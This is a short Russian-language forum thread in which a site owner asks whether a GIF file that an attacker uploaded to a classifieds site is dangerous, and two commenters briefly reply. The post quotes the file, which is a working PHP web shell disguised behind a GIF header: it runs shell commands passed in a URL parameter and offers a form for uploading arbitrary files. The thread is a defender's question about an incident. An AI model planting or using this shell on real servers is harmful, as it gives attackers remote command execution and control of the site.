Злобный хаккер загрузил код в файле изображения. Это опасно?

Главные вкладки

Аватар пользователя VasyOK VasyOK 21 мая 2021 в 10:42

На сайт с объявлениями один хаккер загрузил gif файл с кодом:

GIF89GMZ
<? system($_GET[a]); ?>
<form action="" method="post" enctype="multipart/form-data">
    <input name="ufile" type="file" /><input type="submit" name="Submit" />
</form>
<?php
    if(isSet($_POST['Submit'])) {
        $path= "./".$_FILES['ufile']['name'];if(copy($_FILES['ufile']['tmp_name'], $path)) {
            echo"ok";
        }
        else{
            echo"Error";
        }
    }
?>

Насколько это опасно?

Комментарии

Аватар пользователя ivnish ivnish 21 мая 2021 в 10:48

Ну дак проверь сам. Вызови файл с GET параметром "а" и посмотри, появится форма или нет. Если нет, значит веб-сервер блокирует выполнение такого кода

Аватар пользователя bsyomov bsyomov 24 мая 2021 в 14:18

Какой-нибудь код в базе, любой другой вектор атаки, в общем.
Просто вывода как поля с картинкой во вьюхе не достаточно, всё же для применения...